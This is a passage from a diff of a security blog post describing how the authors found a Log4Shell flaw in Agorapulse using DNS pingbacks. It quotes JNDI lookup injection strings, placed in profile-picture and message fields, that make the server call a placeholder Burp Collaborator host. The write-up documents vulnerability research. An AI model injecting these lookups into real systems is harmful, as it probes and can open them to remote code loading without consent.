Snap-sec/blog/_posts/2022-09-01-Log4shell-on-agorapulse.md

 If we were using a payload in the profile-picture field we would use `${jndi:ldap://profilepic.<Your-Burp-Collab-URL>/a}` and if we were pasting a payload in the message box we used `${jndi:ldap://inbox.<Your-Burp-Collab-URL>/a}` and so on, It easily allowed us to identify the vulnerable request to trigger the vulnerability.

-On the other hand, we also played it safe, using a payload that was not at all harmful to the client i.e did not result in any denial of service attack or executing any malicious commands inside the application.
+On the other hand, we also played it safe, using a payload that was not at all harmful to the client i.e it did not result in any denial of service attack or executing any malicious commands inside the application.
 The purpose of the payload was just to give us a pingback so the place of vulnerability could be identified.
 So we devised the following safe payload to identify the DNS pingbacks : `${jndi:ldap://<Your-Burp-Collab-URL>/a}`.

 So now the identification process began, and after a while, we received two pingbacks.
 One of the received was a false positive.
 But next up, we had a DNS pingback that identified the presence of Log4shell vulnerability.